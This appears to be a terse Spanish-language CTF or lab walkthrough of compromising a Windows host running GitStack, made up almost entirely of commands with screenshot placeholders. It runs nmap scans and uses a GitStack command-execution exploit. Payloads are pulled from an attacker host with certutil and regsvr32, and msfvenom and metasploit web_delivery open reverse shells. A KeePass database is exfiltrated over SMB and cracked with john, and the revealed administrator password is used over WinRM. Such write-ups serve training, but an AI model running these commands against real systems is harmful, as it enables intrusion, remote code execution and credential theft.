nmap -A -p- -oA output 172.31.1.28 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.12 -oG allPorts

Pasted image 20210703125230.png

extractPorts allPorts

Pasted image 20210703125322.png

nmap -sC -sV -p80,135,139,445,3389,5985,47001,49152,49153,49154 172.31.1.12 -oN targeted

Pasted image 20210703125712.png

nmap --script http-enum -p80 172.31.1.12 -oN webScan

Pasted image 20210703143628.png

whatweb 172.31.1.12:80

Pasted image 20210703143709.png

cat targeted

Pasted image 20210703143752.png

Vamos a la página web y parece ser que es algo hecho con Django.

Pasted image 20210703143918.png

Vamos a registration/login y podemos ver las credenciales:

Pasted image 20210703144048.png

Pasted image 20210703150858.png

searchsploit Gitstack

cat 43777.py

Vemos qué hace el script:

Pasted image 20210703152330.png

curl -X POST 172.31.1.12/web/exploit.php -d 'a=whoami'

Pasted image 20210703152929.png

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o reverse_gitstack.exe

curl -X POST 172.31.1.12/web/exploit.php -d 'a=certutil -urlcache -split -f http://10.10.0.12:8888/reverse_gitstack.exe'

python3 -m http.server 8888

nc -lvnp 4444

curl -X POST 172.31.1.12/web/exploit.php -d 'a=reverse_stack.exe'

Pasted image 20210703155420.png

El reverse shell no me funcionó con reverse_stack.exe; se desconectaba a cada rato.

Pasted image 20210703170738.png

msf6>use exploit/multi/script/webdelivery msf6>set LHOST tun0 msf6> set TARGET 3 msf6>set payload windows/meterpreter/reverse_tcp msf6>run

Pasted image 20210703170640.png

curl -X POST 172.31.1.12/web/exploit.php -d 'a=regsvr32 /s /n /u /i:http//10.10.0.12:8080/EzA1or.sct scrobj.dll'

Pasted image 20210703170933.png

msf6>sessions -i 1 meterpreter > shell

Pasted image 20210703171410.png

Pasted image 20210703171908.png

python3 /usr/share/doc/python3-impacket/examples/smbserver.py smbFolder $(pwd)

Pasted image 20210703171836.png

copy password_manager.kdbx \\10.10.0.12\smbFolder

Pasted image 20210703173336.png

keepass2john password_manager.kdbx
keepass2john password_manager.kdbx > stackpass
cat stackpass | cut -d ":" -f 2 | tee stackpass
john stackpass

Pasted image 20210703173556.png

kpcli --kdb=password_manager.kdbx
princess
cd Database2/Windows/
show -f 0

Pasted image 20210703173907.png

crackmapexec winrm 172.31.1.12 -u Administrator -p 'secur3_apass262' -x 'whoami'

